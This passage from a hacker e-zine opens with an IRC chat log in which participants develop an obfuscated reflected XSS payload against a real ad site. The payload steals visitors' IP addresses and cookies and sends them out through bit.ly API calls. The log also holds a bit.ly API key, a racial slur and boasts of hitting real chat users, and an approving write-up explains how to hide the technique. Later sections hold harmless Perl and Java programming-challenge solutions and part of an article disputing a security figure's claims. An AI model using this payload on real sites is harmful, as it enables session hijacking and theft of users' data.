2127. ral)|utmcmd=referral|utmcct=/english/4245268-hf-trance-tiesto-vs-mark-knight-feat-din
2128. o-beautiful-world-original-mix.html; TRUID=12957903034531; CKTIME=1301436534; __utma=
2129. 251001561.940844074.1295790257.1297648116.1301436811.6
2130. Silks: right realtime_links
2131. elchupathingy: lol
2132. Silks: what's that?
2133. elchupathingy: your click
2134. Silks: lolz
2135. Silks: weird how that was referrer
2136. Silks: was from a blank tab
2137. elchupathingy: ya
2138. elchupathingy: but ya works fine
2139. Silks: stop stealing mah cookies
2140. elchupathingy: nom nom cookies
2141. Silks: ahh it was just cookies
2142. Silks: weird, my cookies show all that info? :\
2143. elchupathingy: ya
2144. Silks: ahh google analytics bs
2145. elchupathingy: TRUID=13018098525591; CKTIME=1301809854; popunder=yes; popundr=yes; setover18=1
2146. Silks: tracking cookie
2147. elchupathingy: thats mine
2148. Silks: check my latest one
2149. Silks: sec
2150. elchupathingy: http://bit.ly/hbMGMA much better lol
2151. Silks: WHY?
2152. elchupathingy: cats are awesome
2153. elchupathingy: lol
2154. elchupathingy: u know
2155. elchupathingy: that hurts my feelings
2156. Silks: rofl
2157. Silks: was trying to tamper data it
2158. Silks: but realised that wasn't the actual cookie
2159. elchupathingy: oh haha
2160. Silks: so just spammed your link
2161. Silks: lolz
2162. elchupathingy: with hte same thing?
2163. Silks: pro music
2164. Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179
2165. &format=json&longUrl=http://google.com/search?q=ELCHUPATHINGY_IS_A_NIGGER
2166. elchupathingy: doesn't work with the same thing lol
2167. Silks: i can change the cookie in tamper data
2168. Silks: but
2169. Silks: the js is grabbing document.cookie
2170. Silks: and I can't change the url
2171. Silks: maybe in webgoat but cba loading that
2172. elchupathingy: ah
2173. elchupathingy: but that hurts
2174. elchupathingy: i mean all caps
2175. Silks: shutup
2176. Silks: you stole my cookies
2177. elchupathingy: you clicked the fucking link lol
2178. Silks: I trusted you ;(
2179. elchupathingy: haha
2180. Silks: bah this is so dumb
2181. elchupathingy: lol
2182. elchupathingy: hmm
2183. elchupathingy: but the bit.ly thing is nice because it guarantees unique cookies
2184. Silks: what do you mean?
2185. elchupathingy: it hashes the url
2186. elchupathingy: and my username
2187. elchupathingy: so if the same person comes to the site the cookie will probably be the same and not
2188. be sent again
2189. elchupathingy: see if anyone in #gny clicks my link lol
2190. Silks: nub
2191. Silks: shoulda got it to steal their ip
2192. elchupathingy: lol
2193. elchupathingy: well too late
2194. Silks: can do it later
2195. elchupathingy: ya
2196. elchupathingy: oh thats cool u can modify what the hashes bit.ly goes to
2197. elchupathingy: so u could edit the xss as its happening lol
2198. elchupathingy: nvm just title
2199. Silks: <!--#echo var="REMOTE_ADDR"-->
2200. Silks: weird
2201. Silks: fucking ssi shit
2202. elchupathingy: ya
2203. elchupathingy: well nvm not getting anything from the two clicks lol
2204. Silks: hmm
2205. elchupathingy: but there seems to be confusion over what it is
2206. Silks: that xss, can you get it to alert?
2207. elchupathingy: ya it's the same one i used to get your cookie
2208. elchupathingy: just have a feeling they are using noscript
2209. Silks: where is it executing?
2210. elchupathingy: in body
2211. Silks: the results span?
2212. elchupathingy: <div class="response_time">Results for <span>
2213. Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Edocument.write(document.
2214. cookie);%3C/script%3E
2215. Silks: ahh
2216. Silks: works
2217. Silks: alert doesn't
2218. elchupathingy: oh no strings
2219. elchupathingy: gets escaped
2220. elchupathingy: <script>alert(123)</script> works
2221. Silks: what I just pasted works
2222. elchupathingy: ya
2223. Silks: weird that document.alert doesn't work
2224. Silks: or
2225. Silks: yeah i'm just being dumb
2226. elchupathingy: lol
2227. Silks: hmm
2228. Silks: there is one whatismyip site that returns your ip as text with a specific url
2229. elchupathingy: ya i used that
2230. Silks: link
2231. elchupathingy: sec
2232. elchupathingy: http://www.whatismyip.com/automation/n09230945.asp
2233. Silks: hmm
2234. Silks: technically got it working
2235. Silks: but getting owned by access-control-allow-origin
2236. elchupathingy: getting the ip? or getting it to work as a xss?
2237. Silks: printing the ip
2238. Silks: once I got it, easymode
2239. Silks: that specific XSS site though doesn't allow for it
2240. elchupathingy: ah
2241. Silks: hmm
2242. Silks: but then, that is odd that yours works
2243. Silks: ahh, something to do with actually accessing the method
2244. Silks: as readystagechange or w/e
2245. elchupathingy: im sending the request which is cool
2246. Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH
2247. ttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,4
2248. 7,99,104,101,98,107,105,112,46,99,121,110,100,110,115,46,99,111,109,47));x.onreadystatechange
2249. =function(){%20alert(x.status);%20};x.send();%3C/script%3E
2250. Silks: SAFE
2251. Silks: honestly
2252. Silks: not a dirty liar like you
2253. elchupathingy: lol
2254. elchupathingy: 0,0,0,0
2255. Silks: ?
2256. elchupathingy: alert boxes
2257. Silks: yeah
2258. Silks: that's with x.status
2259. Silks: should be 200
2260. Silks: if you fire up JS console you will see the error
2261. elchupathingy: not getting an error
2262. Silks: browser?
2263. elchupathingy: ff4
2264. Silks: oh it's fucking chrome
2265. elchupathingy: im mean i get a error on the page but its there no matter what
2266. elchupathingy: $(document).pngFix
2267. elchupathingy: is not a function
2268. Silks: although it's still not quite right
2269. Silks: still should return 200
2270. elchupathingy: ya
2271. Silks: well it is grabbing 200
2272. Silks: something up with code
2273. Silks: meh down to this origin bs
2274. Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3Evar%20x%20=%20new%20XMLH
2275. ttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fromCharCode%28104,116,116
2276. ,112,58,47,47,99,104,101,99,106,105,112,46,100,121,110,100,110,115,46,99,111,109,47%29,true%2
2277. 9;x.onreadystatechange=function%28%29{if%28x.readyState%20==%204%29%20{%20if%28x.status%20==%
2278. 20200%29%20{%20alert%28x.responseText%29;%20}}};x.send%28null%29;%3C/script%3E
2279. Silks: code effectively works
2280. Silks: well maybe, on another host
2281. Silks: but if you can host a file elsewhere then you can either chain JS where it does work or use
2282. PHP etc
2283. elchupathingy: ya
2284. elchupathingy: think i got it
2285. elchupathingy: one sec
2286. elchupathingy: Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x%
2287. 20=%20new%20XMLHttpRequest%28%29;x.open%28String.fromCharCode%2871,69,84%29,String.fr
2288. omCharCode%28104,116,116,112,58,47,47,96,111,105,46,104,111,115,116,105,112,46,105,11
2289. 0,102,111%29,true%29;x.onreadystatechange%20=function%28%29{if%28x.readyState==4%29{a
2290. lert%28x.responseText.match%28new%20RegExp%28String.fromCharCode%2892,100,120,49,44,5
2291. 1,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49
2292. ,44,51,125%29%29%29%29;}};x.send%28%29;%3C/script%3E
2293. elchupathingy: http://bit.ly/f1Ygcc :D
2294. Silks: nice work elchupathingy
2295. Barney-: =]
2296. Barney-: what happened
2297. Silks: umm, we were messing around with XSS
2298. Barney-: rgr
2299. Silks: now have XSS code that can steal your IP
2300. Silks: well, it grabs the IP, gonna add it to what elchu was working on earlier, storing it in
2301. bit.ly links
2302. Barney-: hmm
2303. Silks: yeah Barney-, check this
2304. Barney-: ??
2305. Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3Cscript%3E;var%20x%20=%20new%20XML
2306. HttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,
2307. 47,97,112,105,46,104,111,115,116,105,112,46,105,110,102,111),true);x.onreadystatechange%20=%2
2308. 0function(){if(x.readyState==4){alert(x.responseText);}};x.send();%3C/script%3E
2309. Silks: this will print the response page of a whatismyip site
2310. Barney-: very cool
2311. Silks: I was trying with a different site and it was failing
2312. Barney-: thats real cool actually
2313. Silks: elchu tried with that one
2314. Silks: and then used regex
2315. Silks: so
2316. Silks: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=<script>;var%20x%20=%20new%20XMLHttp
2317. Request();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47,47,9
2318. 7,112,105,46,104,111,115,116,105,112,46,105,110,102,111),true);x.onreadystatechange%20=functi
2319. on(){if(x.readyState==4){alert(x.responseText.match(new%20RegExp(String.fromCharCode(92,100,1
2320. 23,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,
2321. 49,44,51,125))));}};x.send();</script>
2322. Silks: also we were discussing how to export info and talked about creating bit.ly links with APIs
2323. Silks: found out that it is possible to retrieve newly created links in the API too
2324. Silks: so..
2325. Barney-: but
2326. Barney-: how do you figure out
2327. Barney-: the bit.ly link
2328. Barney-: after its been created
2329. Silks: because of a bit.ly account
2330. Silks: so
2331. Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895177c5ce2a29cc9f0b252495179
2332. &format=json&longUrl=http://google.com/search?q=
2333. Silks: will create the url
2334. Barney-: ah ok ok
2335. Barney-: so you login to the account
2336. Silks: and you can export the data but adding it to q=
2337. Barney-: but we don't want IPs we want coookies
2338. Silks: idd
2339. Silks: so
2340. Silks: if you look at the url above
2341. Silks: you just do
2342. Silks: http://api.bitly.com/v3/shorten?login=elchupathingy&apiKey=R_316895277c5ce2a29cc9f0b252495179
2343. &format=json&longUrl=http://google.com/search?q= + document.cookie
2344. Barney-: ah rgr
2345. Silks: specifically that above looks like
2346. Silks: String.fromCharCode(104,116,116,112,58,47,47,97,112,105,46,98,105,116,108,121,46,99,111,109,4
2347. 7,118,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,62,101,108,99,104,117,112,97,1
2348. 17,104,105,110,103,121,38,97,112,105,75,101,121,61,82,95,51,49,54,56,57,53,49,55,55,99,53,98,
2349. 101,50,97,50,57,99,99,57,102,48,98,50,53,50,52,57,53,49,55,57,38,102,111,114,109,97,116,61,10
2350. 6,115,111,110,38,108,111,110,103,85,114,108,61,104,116,116,112,58,47,47,103,111,111,103,108,1
2351. 01,46,99,111,109,47,115,101,97,114,99,104,63,113,61).concat(document.cookie));
2352. Silks: so since I've woke up and elchu found the ip, I'm gonna combine both of them so it will store
2353. an IP in a bit.ly account
2354. Barney-: ya but in what type of attack scenario would IP be helpful?
2355. Silks: was saying before, obviously we can just store all this info in the same way I did with my
2356. XSS session stealer. call a .php and store it in a db
2357. Barney-: dont get me wrong its cool, just wondering application
2358. Barney-: could do it easier
2359. Barney-: and be like
2360. Barney-: hey visit www.silks.com/index.php?id=4 (where id isn't even a var...)
2361. Barney-: it'll 404, and show up in access_log
2362. Barney-: voila
2363. Silks: hence what I said above but yeah
2364. Silks: this is just a way of doing it without any hosting etc
2365. Barney-: true
2366. Silks: and pretty interesting to be storing info in bit.ly links
2367. Silks: that page wouldn't 404 if you just added a get var
2368. Silks: funny thing is, when you've made the full XSS you can just package it up in a bit.ly
2369. Silks: elchu posted it in #gny and a couple of people clicked and didn't even understand what
2370. happened
2371. Silks: specifically, Compound and jmp got XSS'ed and knew no better
2372. Barney-: hahah
2373. Barney-: a bit.ly starts the XSS
2374. Barney-: and ends up in a bit.ly
2375. Barney-: hence why I don't trust you
2376. Barney-: and i go curl -I silks-dumb-links.com
2377. Silks: almost done
2378. Silks: gonna own #gny
2379. Silks: Barney-
2380. Silks: mind testing this?
2381. Silks: http://bit.ly/e93lCU
2382. Silks: bit.ly/gvZPM8
2383. Barney-: Location: http://ads.clicksor.com/newServing/yesupSearch/web.php?q=<script>var x = new XMLH
2384. ttpRequest();x.open(String.fromCharCode(71,69,84),String.fromCharCode(104,116,116,112,58,47
2385. ,47,92,112,105,46,103,111,12,116,105,112,46,105,110,102,111),true);x.onreadystatechange =fu
2386. nction(){if(x.readyState==4){var ip = x.responseText.match(new RegExp(String.fromCharCode(9
2387. 2,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92,100,123,49,44,51,125,92,46,92
2388. ,100,123,49,44,51,125)));var y=new XMLHttpRequest();y.open(String.fromCharCode(71,69,84),St
2389. ring.fromCharCode(104,116,116,112,58,47,47,97,112,105,46,98,105,116,108,121,46,99,111,109,4
2390. 7,118,51,47,115,104,111,114,116,101,110,63,108,111,103,105,110,61,115,105,108,107,115,121,3
2391. 8,97,112,105,75,101,121,61,82,95,98,100,102,57,54,101,56,51,55,49,51,99,50,50,55,48,50,52,5
2392. 3,55,55,48,102,55,101,99,56,48,56,98,49,100,38,102,111,114,108,97,116,61,106,115,111,110,38
2393. ,108,111,110,103,85,114,107,61,104,116,116,112,58,47,44,103,111,111,103,108,101,46,99,111,1
2394. 09,47,115,101,97,114,99,104,63,113,61).concat(ip));y.send();}};x.send();</script>
2395. Barney-: MIME-Version: 1.0
2396. Barney-: Content-Length: 1177
2397. Barney-: how do you pass a mime-version
2398. Barney-: with no mime type
2399. Silks: probably to do with the bit.ly link
2400. elchupathingy: just woke up
2401. Silks: tricked a few people lolz
2402. elchupathingy: ya saw
2403. elchupathingy: i was happy with the ip lol
2404. elchupathingy: but having to add in the random ass semicolons was annoying
2405. Silks: I'm thinking it might be possible to use browser location tracking to grab data
2406. elchupathingy: probably
2407. Silks: you know the browser sends a list of all the access points and macs near you
2408. Silks: crazy shit
2409. Silks: then you can use those macs with google api to triangulate your position
2410. elchupathingy: never tried to use it
2411. Silks: crazy how much data your browser sends though
2412. elchupathingy: ya
2413. Silks: would be lol to XSS->triangulated position
2414. Silks: similar shit to what samy did
2415. Silks: but without being a fucking tool
2416. elchupathingy: heh
2417. elchupathingy: well you can get it but ff asks for permission to get the lat,lng
2418. Silks: yeah
2419. Silks: but if location tracking is enabled it goes through
2420. elchupathingy: true then its fucking simple lol
2421. Silks: you're fucking simple
2422. Silks: think only in the past 6 months-year they started asking users tbh
2423. elchupathingy: function loc(p) { alert( p ); }navigator.geolocation.getCurrentPosition(loc);
2424. elchupathingy: er
2425. elchupathingy: function loc(p){alert(p.coords.latitude+","+p.coords.longitude);};navigator.geolocati
2426. on.getCurrentPosition(loc);
2427. Silks: listening to that song you stole from my cookies
2428. d4rK3r: who is more awesome then i?
2429.  
2430. http://ads.clicksor.com/newServing/yesupSearch/web.php?q=%3cscript%3e%3bvar+x+%3d+new+XMLHttpRequest
2431. ()%3bx.open(String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c47%
2432. 2c47%2c97%2c112%2c105%2c46%2c104%2c111%2c115%2c116%2c105%2c112%2c46%2c105%2c110%2c102%2c111)%2ctrue)
2433. %3bx.onreadystatechange%3dfunction()%7bif(x.readyState%3d%3d4)%7bvar+ip+%3d+x.responseText.match(new
2434. +RegExp(String.fromCharCode(92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44
2435. %2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c51%2c125%2c92%2c46%2c92%2c100%2c123%2c49%2c44%2c5
2436. 1%2c125)))%3bvar+y+%3d+new+XMLHttpRequest()%3by.onreadystatechange+%3d+function()%7bif(y.readyState%
2437. 3d%3d4)window.location%3dString.fromCharCode(103%2c116%2c116%2c112%2c58%2c47%2c47%2c98%2c105%2c116..
2438. ..d%3by.open(+String.fromCharCode(71%2c69%2c84)%2cString.fromCharCode(104%2c116%2c116%2c112%2c58%2c4
2439. 7%2c47%2c97%2c112%2c105%2c46%2c98%2c105%2c116%2c108%2c121%2c46%2c99%2c111%2c109%2c47%2c118%2c51%2c47
2440. %2c115%2c104%2c111%2c114%2c116%2c101%2c110%2c63%2c108%2c111%2c103%2c105%2c110%2c61%2c101%2c108%2c99%
2441. 2c104%2c117%2c112%2c97%2c116%2c104%2c105%2c110%2c103%2c...57%2c99%2c99%2c57%2c102%2c48%2c98%2c50%2c5
2442. 3%2c50%2c52...c61%2c106%2c115%2c111%2c110%2c38%2c108%2c111%2c110%2c103%2c85%2c114%2c108%2c61%2c104%2
2443. c116%2c116%2c112%2c58%2c47%2c47%2c103%2...2c97%2c114%2c99%2c104%2c63%2c113%2c61).concat(ip).concat(d
2444. ocument.cookie))%3by.send()%3b%7d%3b%7d%3bx.send()%3b%3c%2fscript%3e
2445.  
2446. This XSS string is the final product of the above discussion, shown above incorporates the grabbing
2447. of the user's IP and cookie and utilizing the bit.ly storage method also outlined above.
2448.  
2449. The simple bit.ly API makes this method of cookie grabbing simple and effective. Getting the cookie
2450. information is a simple request to the bit.ly services, and all of the relevant information will be
2451. returned in a XML or JSON string. Duplicate entries are effectively nulled by how bit.ly hashes the
2452. URL to create its shortened ones. Accounts are easily created, and thus the links and storing of
2453. information can be distributed amoungst many different bit.ly accounts. This makes it much harder to
2454. find the sole source of the links. A combination with other URL shortening services such as goo.gl,
2455. on.fb.me, and tinyurl can make this a very robust method of cookie stealing. The XSS string above
2456. can be tweaked to hide its real intentions and can effectively work against someone that does not
2457. question links sent to them.
2458.  
2459. A major weakness of this technique is that it relies on JavaScript, so browsers that employ NoScript
2460. will not be affected, but utilizing other standard XSS techniques and server-side files could ensure
2461. that if you can't grab both the IP+cookie, you can at least grab an IP. As simple as this technique
2462. may be, there is a lot more potential for further privacy and security breaches if you can think
2463. outside the box. Not to mention that we think storing data in bit.ly is pretty hilarious.
2464.  
2465.  
2466. [==================================================================================================]
2467.  
2468. -=[ 0x0c Programming Challenge
2469. -=[ Author: storm
2470.  
2471. -=[ Email: storm@gonullyourself.org
2472. -=[ Website: http://gonullyourself.org/
2473.  
2474.  
2475. Sorry, no programming challenge this issue. If you have ideas, don't hesitate to shoot us an email.
2476.  
2477. --------------------------------------------------------------------------------
2478.  
2479. Last issue, we asked readers to compare the depth-first search and breadth-first search routing
2480. algorithms against a given graph.
2481.  
2482. Graph Solution by melte
2483. Language: Perl
2484. --------------------
2485.  
2486. #!/usr/bin/perl
2487.  
2488. use strict;
2489. use warnings;
2490.  
2491. my $obj = { points => build_tree(<DATA>) };
2492.  
2493. # Uncomment for examples given in the article
2494. =pod
2495. for ('C', 'D', 'E')
2496. {
2497. my $end = breadth_first($obj, 'A', $_);
2498. my $mid = depth_first($obj, 'A', $_);
2499. print "A -> $_ : DF=$mid BF=$end\n";
2500. }
2501. exit;
2502. =cut
2503.  
2504. for my $first (sort { $a cmp $b } keys %{$obj->{points}})
2505. {
2506. for my $second (sort { $a cmp $b } keys %{$obj->{points}})
2507. {
2508. my $df = depth_first($obj, $first, $second);
2509. my $bf = breadth_first($obj, $first, $second);
2510.  
2511. my $message = ($df != -1 && $df < $bf)
2512. ? "Depth-First"
2513. : ($df > $bf && $bf != -1)
2514. ? "Breadth-First"
2515. : "Tie";
2516.  
2517. print "$first -> $second : DF=$df, BF=$bf : $message\n";
2518. }
2519. }
2520.  
2521. # The data structure I'm using is a hashref with letters as keys,
2522. # and an arrayref (as the value) listing its neighbours
2523. sub build_tree
2524. {
2525. my (@input) = @_;
2526. my $vertex = {};
2527.  
2528. # Not strictly necessary but this + the check below is good for catching typos
2529. while ($input[0] =~ /(\w+)[,}]/g)
2530. {
2531. $vertex->{$1} = [];
2532. }
2533.  
2534. while ($input[1] =~ /\{(\w+)\,(\w+)\}/g)
2535. {
2536. defined $vertex->{$1} and defined $vertex->{$2} or die "Malformed point [$1,$2]";
2537. push @{$vertex->{$1}}, $2;
2538.  
2539. push @{$vertex->{$2}}, $1;
2540. }
2541.  
2542. $vertex;
2543. }
2544.  
2545. # Setup the structure and enter recursion
2546. sub depth_first
2547. {
2548. my ($obj, $start, $end ) = @_;
2549. $obj = { checked => [], points => $obj->{points} };
2550.  
2551. $start eq $end and return 0;
2552.  
2553. _depth_first($obj, $start, $end);
2554. }
2555.  
2556. # Check all trees from a starting point
2557. sub _depth_first
2558. {
2559. my ($obj, $start, $end) = @_;
2560.  
2561. defined $obj->{checked} or $obj->{checked} = [];
2562.  
2563. push @{$obj->{checked}}, $start;
2564.  
2565. for my $neighbour (sort { $a cmp $b } @{$obj->{points}{$start}})
2566. {
2567. # We can exclude previously checked items
2568. grep { $_ eq $neighbour } @{$obj->{checked}} and next;
2569. push @{$obj->{checked}}, $neighbour;
2570.  
2571. $neighbour eq $end and return 1;
2572.  
2573. my $counter = _depth_first($obj, $neighbour, $end);
2574. $counter != -1 and return $counter + 1;
2575. }
2576. return -1;
2577. }
2578.  
2579. # Surely there is a pretty and short recursive way to do this
2580. sub breadth_first
2581. {
2582. my ($obj, $start, $end) = @_;
2583.  
2584. $start eq $end and return 0;
2585.  
2586. my $tree = $obj->{points}{$start};
2587.  
2588. my $level = 0;
2589.  
2590.  
2591. @$tree = sort { $a cmp $b } @$tree;
2592.  
2593. while (1)
2594. {
2595. ++$level;
2596.  
2597. # This problem could exist with a discontinuous graph as input
2598. @$tree or return -1;
2599.  
2600. grep { $_ eq $end } @$tree and return $level;
2601.  
2602. # We don't want to add items and then sort
2603. # We want to add sorted lists to preserve correct ordering
2604. my $temp = [];
2605. for my $item ( sort { $a cmp $b } @$tree )
2606. {
2607. # Exclude the parent node in this context
2608. push @$temp, grep { $_ ne $item } @{$obj->{points}{$item}};
2609. }
2610. $tree = $temp;
2611. }
2612. }
2613.  
2614. # Uncomment for smaller graph from article
2615. =pod
2616. __DATA__
2617. V = {A,B,C,D,E}
2618. E = {{A,B},{A,C},{B,C},{B,D},{B,E},{C,D},{D,E}}
2619. __END__
2620. =cut
2621.  
2622. __DATA__
2623. V = {A,B,C,D,E,F,G,H}
2624. E = {{A,B},{A,D},{A,F},{B,G},{B,H},{C,D},{C,E},{D,E},{D,F},{F,G},{G,H}}
2625.  
2626. --------------------
2627.  
2628. $ perl graph.pl
2629. A -> A : DF=0, BF=0 : Tie
2630. A -> B : DF=1, BF=1 : Tie
2631. A -> C : DF=5, BF=2 : Breadth-First
2632. A -> D : DF=4, BF=1 : Breadth-First
2633. A -> E : DF=6, BF=2 : Breadth-First
2634. A -> F : DF=3, BF=1 : Breadth-First
2635. A -> G : DF=2, BF=2 : Tie
2636. A -> H : DF=3, BF=2 : Breadth-First
2637. B -> A : DF=1, BF=1 : Tie
2638. B -> B : DF=0, BF=0 : Tie
2639. B -> C : DF=3, BF=3 : Tie
2640. B -> D : DF=2, BF=2 : Tie
2641. B -> E : DF=4, BF=3 : Breadth-First
2642. B -> F : DF=3, BF=2 : Breadth-First
2643. B -> G : DF=4, BF=1 : Breadth-First
2644. B -> H : DF=5, BF=1 : Breadth-First
2645. C -> A : DF=2, BF=2 : Tie
2646. C -> B : DF=3, BF=3 : Tie
2647. C -> C : DF=0, BF=0 : Tie
2648. C -> D : DF=1, BF=1 : Tie
2649. C -> E : DF=2, BF=1 : Breadth-First
2650. C -> F : DF=5, BF=2 : Breadth-First
2651. C -> G : DF=4, BF=3 : Breadth-First
2652. C -> H : DF=5, BF=4 : Breadth-First
2653. D -> A : DF=1, BF=1 : Tie
2654. D -> B : DF=2, BF=2 : Tie
2655. D -> C : DF=1, BF=1 : Tie
2656. D -> D : DF=0, BF=0 : Tie
2657. D -> E : DF=2, BF=1 : Breadth-First
2658. D -> F : DF=4, BF=1 : Breadth-First
2659. D -> G : DF=3, BF=2 : Breadth-First
2660. D -> H : DF=4, BF=3 : Breadth-First
2661. E -> A : DF=3, BF=2 : Breadth-First
2662. E -> B : DF=4, BF=3 : Breadth-First
2663. E -> C : DF=1, BF=1 : Tie
2664. E -> D : DF=2, BF=1 : Breadth-First
2665. E -> E : DF=0, BF=0 : Tie
2666. E -> F : DF=6, BF=2 : Breadth-First
2667. E -> G : DF=5, BF=3 : Breadth-First
2668. E -> H : DF=6, BF=4 : Breadth-First
2669. F -> A : DF=1, BF=1 : Tie
2670. F -> B : DF=2, BF=2 : Tie
2671. F -> C : DF=3, BF=2 : Breadth-First
2672. F -> D : DF=2, BF=1 : Breadth-First
2673. F -> E : DF=4, BF=2 : Breadth-First
2674. F -> F : DF=0, BF=0 : Tie
2675. F -> G : DF=3, BF=1 : Breadth-First
2676. F -> H : DF=4, BF=2 : Breadth-First
2677. G -> A : DF=2, BF=2 : Tie
2678. G -> B : DF=1, BF=1 : Tie
2679. G -> C : DF=4, BF=3 : Breadth-First
2680. G -> D : DF=3, BF=2 : Breadth-First
2681. G -> E : DF=5, BF=3 : Breadth-First
2682. G -> F : DF=4, BF=1 : Breadth-First
2683. G -> G : DF=0, BF=0 : Tie
2684. G -> H : DF=2, BF=1 : Breadth-First
2685. H -> A : DF=2, BF=2 : Tie
2686. H -> B : DF=1, BF=1 : Tie
2687. H -> C : DF=4, BF=4 : Tie
2688. H -> D : DF=3, BF=3 : Tie
2689. H -> E : DF=5, BF=4 : Breadth-First
2690. H -> F : DF=4, BF=2 : Breadth-First
2691. H -> G : DF=5, BF=1 : Breadth-First
2692. H -> H : DF=0, BF=0 : Tie
2693.  
2694. By running this script, we can clearly see from the output that breadth-first search is the winning
2695. algorithm out of the two. However, this is not always the case. Some graphs will be better
2696. traversed by means of depth-first search, while others will not. A judgment call must be made
2697. depending on the specific scenario. For instance, massive graphs with a target that is many hops
2698. away from the origin point will more likely be searched by depth-first search simply due to resource
2699. limitations. Breadth-first search of a massive graph requires many layers upon layers of recursion.
2700. An entire "tree" must be stored in memory, which will quickly run low as the tree grows, causing
2701. swapping to occur or the system to crash when the available RAM hits zero. With depth-first search,
2702. only a single "branch" of recursion is stored in memory, requiring much less space.
2703.  
2704. --------------------
2705.  
2706. Additionally, as an amendment to issue #3, we missed a solution submitted by Suzaku for the
2707. challenge of writing any one of a number of bit adders.
2708.  
2709. Ripple-Carry Adder by Suzaku
2710. Language: Java
2711. --------------------
2712.  
2713. import java.util.Scanner;
2714. class adder{
2715. public static void main(String args[]){
2716. int bitS[],obA[],obB[],i,cin=0,cout=0;
2717. String bitA,bitB;
2718. char a,b;
2719. Scanner input=new Scanner(System.in);
2720. obA=new int[100];
2721. obB=new int[100];
2722. bitS=new int[100];
2723. System.out.println("Enter the bit pattern A");
2724. bitA=new StringBuffer(input.next()).reverse().toString();
2725. System.out.println("Enter the bit pattern B");
2726. bitB=new StringBuffer(input.next()).reverse().toString();
2727. if(bitA.length()==bitB.length()){
2728. System.out.print("Sum = ");
2729. for(i=0; i<bitA.length(); i++){
2730. obA[i]=Integer.parseInt(new Character(bitA.charAt(i)).toString());
2731. obB[i]=Integer.parseInt(new Character(bitB.charAt(i)).toString());
2732. bitS[i]=obA[i]^obB[i]^cin;
2733. cout=(obA[i]*obB[i])+cin*(obA[i]^obB[i]);
2734. cin=cout;
2735. }
2736. for(; i>0; i--)
2737. System.out.print(bitS[i-1]);
2738. System.out.print("\nCarry = "+cout);
2739. }
2740. else
2741. System.out.print("Length of A and B should be same");
2742. }
2743. }
2744.  
2745.  
2746. [==================================================================================================]
2747.  
2748. -=[ 0x0d The Scoop on LIGATT
2749.  
2750.  
2751. LIGATT Security International (more commonly known as just LIGATT) is a security company founded and
2752. run by the (in)famous Gregory D. Evans. Evans is mainly known for his claim of being the "world's
2753. number 1 hacker" and his ability to teach anyone to be the same in 15 minutes through one of his
2754. company's educational courses. Much controversy surrounds Evans and his company with allegations of
2755. severe debt, shady marketing schemes, and and overall lack of security knowledge necessary to
2756. provide consulting services of any capacity. Attrition.org claims that Evans is currently in debt
2757. of over $9,000,000 USD, and the Better Business Bereau currently lists LIGATT as an 'F' rating.
2758. Evans denies all counts of misdoing and considers himself a wealthy, successful businessman.
2759.  
2760. In mid-January, Go Null Yourself Zine contacted LIGATT to request an interview with Evans. After a
2761. few days of conversation with Evans' PR assistant, the interview request was accepted. The
2762. interview spanned across two days (due to phone difficulties) and about 2 hours and 10 minutes of
2763. conversation was recorded. A detailed look at Evans' past was provided, and many shots were taken
2764. at the people and organizations calling him a fraud.
2765.  
2766. There are simply too many details from the interview to enumerate here, so we have instead made the
2767. recordings public at http://www.gonullyourself.org/zine/4/ligatt for those who are interested.
2768.  
2769. After the interview, we contacted Attrition.org to get their take on everything told to us by Evans.
2770. We provided a list of key claims made by Evans, and this is their reply:
2771.  
2772. All of this is the best of my memory, or with citation if I have it.
2773.  
2774. : Evans lived in Germany in his youth and got in trouble for changing a
2775. : friend's grades. The father of this friend, who was a lawyer, hired
2776. : Evans (as a kid) to break into the computers of a competing law firm.
2777.  
2778. I think this is partially new. The 'changing grades' claim has been made
2779. before, but not with additional details above.
2780.  
2781. : In 1994, Evans operated the 4th or 5th largest ISP in the country named
2782. : Connect America financed by money made from hacking side-jobs. (I am
2783. : unsure if he meant in America or Germany)
2784.  
2785. In the US, in California. Claims of the size are unverified, and I doubt
2786. they can be. The part about making money from hacking side-jobs is likely
2787. BS. During this time with Connect America, he was stealing phone lines and
2788. reselling them. This is basic toll fraud, and what lead him to getting
2789. busted and serving 2 years in prison.
2790.  
2791. http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf
2792.  
2793. : Evans was friends with Kevin Mitnick in California, and they learned
2794. : about computers and phreaking together.
2795.  
2796. This is a lie. Kevin Mitnick confirmed that while they were on the same
2797. floor of the LA detention center, they did not share a cell (as previously
2798. claimed by Evans), did not share any hacking / phreaking information, and
2799. did not learn from each other. Mitnick described Evans as someone who
2800. didn't seem to know much about hacking and asked basic questions. You can
2801. confirm this with a mail to Mitnick, and some of it covered here:
2802.  
2803. http://attrition.org/errata/charlatan/gregory_evans/evans09.html
2804.  
2805. http://twitter.com/kevinmitnick/statuses/16428972158
2806.  
2807. http://twitter.com/kevinmitnick/statuses/16429370781
2808.  
2809. : Evans has 100 employees and has hired people in Pakistan and India.
2810.  
2811. This is hard to positively debunk, but I am relatively sure he does not
2812. have 100 employees currently. He has likely had 100 historically, but has
